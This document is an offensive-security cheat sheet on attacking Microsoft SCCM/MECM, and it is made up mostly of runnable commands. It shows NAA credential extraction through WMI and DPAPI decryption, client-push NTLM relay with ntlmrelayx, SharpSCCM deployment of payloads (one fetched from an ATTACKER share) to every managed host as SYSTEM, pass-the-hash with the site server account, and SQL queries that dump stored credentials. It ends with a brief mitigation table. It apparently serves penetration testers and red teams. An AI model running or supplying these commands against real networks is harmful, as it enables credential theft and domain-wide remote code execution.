SCCM / MECM Attacks
aka SCCM, MECM, ConfigMgr, System Center Configuration Manager, SharpSCCM
SCCM (System Center Configuration Manager / MECM) attack surface: hierarchy discovery, credential extraction from NAA/client push, site takeover via relay, SCCM as a domain-wide code execution primitive, and SharpSCCM tooling.
Ports
| Port | Proto | Notes |
|---|---|---|
80 | tcp | SCCM Management Point (HTTP) |
443 | tcp | SCCM Management Point (HTTPS) |
8005 | tcp | SCCM Service Manager default |
10123 | tcp | SCCM client notification |
Fingerprint
- AD has computer objects with 'SMS' or 'SCCM' in their name
- SPN: WSMAN/sccm.domain.local or HTTP/sccm.domain.local registered
- SharpSCCM.exe local sms-provider finds the local MP name
Key files
| Path | Holds | Sensitive |
|---|---|---|
C:\Windows\CCM\CcmMessaging.log | SCCM client communication logs | |
WMI: root\ccm\policy\defaultmachine\requestedconfig | Network Access Account (NAA) credentials (encrypted) | sensitive |
SCCM site database (MSSQL) | all managed host data, credentials, packages | sensitive |
Exploitation primitives
- NAA credentials: WMI query extracts encrypted NAA creds → DPAPI decrypt → plaintext AD creds
- Client push install: forces NTLM auth from site server → relay to LDAP → escalation
- Compromised SCCM admin → deploy malicious package to all managed hosts = mass RCE
- Site server machine account has local admin on all managed clients via push install
Discovery
Identify SCCM infrastructure
# From AD — find SCCM servers by SPN/name
Get-DomainComputer | Where { $_.dnshostname -match "sccm|mecm|configmgr|cm" }
Get-DomainComputer -SPN "SMS*" | select dnshostname, serviceprincipalname
# Find AD System Management container (where site server stores data)
Get-DomainObject -SearchBase "CN=System Management,CN=System,DC=domain,DC=local"
# From a managed client
SharpSCCM.exe local sms-provider
SharpSCCM.exe local site-info# Network sweep for SCCM management points
nmap -p 80,443,8005 10.129.0.0/24 --open
nxc smb 10.129.0.0/24 | grep -i "sccm\|mecm\|configmgr"# SCCMHunter — automated SCCM discovery
python3 sccmhunter.py find -u user -p pass -d domain.local -dc DC_IPCredential Extraction from Managed Clients
Network Access Account (NAA) via WMI
SCCM uses a Network Access Account to access distribution points. This account’s credentials are stored encrypted on managed clients in WMI. Users with local admin can decrypt them.
# SharpSCCM (from a managed client)
SharpSCCM.exe local naa
# Manual WMI query
Get-WmiObject -Namespace root\ccm\policy\Machine\RequestedConfig -Class CCM_NetworkAccessAccount
# Or via CIM
Get-CimInstance -Namespace root\ccm\policy\Machine\RequestedConfig -ClassName CCM_NetworkAccessAccountOutput includes base64/hex-encoded credentials — decrypt using DPAPI:
# CyberChef or PowerShell DPAPI
$encrypted = 'hex_encoded_credential'
$bytes = [System.Convert]::FromHexString($encrypted)
$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($bytes, $null, 'LocalMachine')
[System.Text.Encoding]::UTF8.GetString($decrypted)Client Push Account
# The push install account is often stored in SCCM and has local admin on all clients
SharpSCCM.exe get naa
SharpSCCM.exe get accountsClient Push Install → NTLM Relay
When SCCM pushes an agent to a new client, the site server authenticates over SMB using the push install account. Force a push to your attacker machine → capture and relay the NTLM hash.
# Step 1: start ntlmrelayx targeting LDAP (for DCSync rights or computer account creation)
ntlmrelayx.py -t ldap://DC_IP --add-computer EVILPC --computer-password 'EvilPass123!'
# Step 2: request client push install targeting your attacker IP
SharpSCCM.exe invoke admin-service -sms SCCM_SERVER -sc TARGET_SITECODE -uc attacker@domain.local -pc ATTACKER_IP
# The site server connects to ATTACKER_IP:445 → ntlmrelayx captures + relays the push account hashSCCM Admin → Mass RCE
If you obtain SCCM administrator credentials:
Deploy a malicious application
# SharpSCCM — create and deploy application to all managed clients
SharpSCCM.exe exec -sms SCCM_SERVER -sc SITECODE -p "cmd.exe /c whoami > C:\Temp\pwned.txt" -d "All Systems"
# Or:
SharpSCCM.exe exec -sms SCCM_SERVER -sc SITECODE -p "powershell -enc BASE64_PAYLOAD"This executes as SYSTEM on every machine the collection targets — equivalent to domain-wide RCE.
Create a package (stealthier)
# Create package pointing to attacker-hosted payload
SharpSCCM.exe get collections
SharpSCCM.exe exec -sms SERVER -sc SC -p "\\ATTACKER\share\payload.exe" -t "All Workstations"SCCM Hierarchy Takeover
If you compromise the Central Administration Site (CAS) or Primary Site:
# Enumerate site hierarchy
SharpSCCM.exe get sites
SharpSCCM.exe get collections -sms SCCM_SERVER -sc SITECODE
# Site server has local admin on all managed clients (from push installation)
# Compromise site server machine account → PTH to all clients
nxc smb 10.129.0.0/24 -u 'SCCMSERVER$' -H MACHINE_ACCOUNT_HASHSCCM Database (MSSQL)
The SCCM site database stores all managed host info, credentials, and package configs:
# Connect to SCCM DB (usually on the site server or a dedicated SQL server)
mssqlclient.py -windows-auth domain.local/admin:pass@SCCM_SQL_SERVER
# Query managed computers
SQL> SELECT Name, LastLogon00, IPAddress0 FROM CM_SC1.dbo.v_R_System;
# Extract all NAA credentials stored in DB
SQL> SELECT UserName, Password FROM CM_SC1.dbo.vSMS_SC_SiteDefinition_Property WHERE PropertyName = 'NAA';SCCMHunter — Automated Attack
# Full discovery
python3 sccmhunter.py find -u user -p pass -d domain.local -dc DC_IP
# Check permissions
python3 sccmhunter.py check admin -u user -p pass -d domain.local
# Extract NAA credentials
python3 sccmhunter.py http -u user -p pass -d domain.local -t SCCM_SERVERDetection and Hardening Notes
| Attack | Mitigation |
|---|---|
| NAA credential extraction | Use HTTPS for MP; use certificates not NAA accounts |
| Client push relay | Enable push install account protection; use Kerberos |
| Admin → mass RCE | Tier SCCM admins; require MFA; log all deployments |
| DB access | Separate SCCM DB on hardened SQL; restrict access |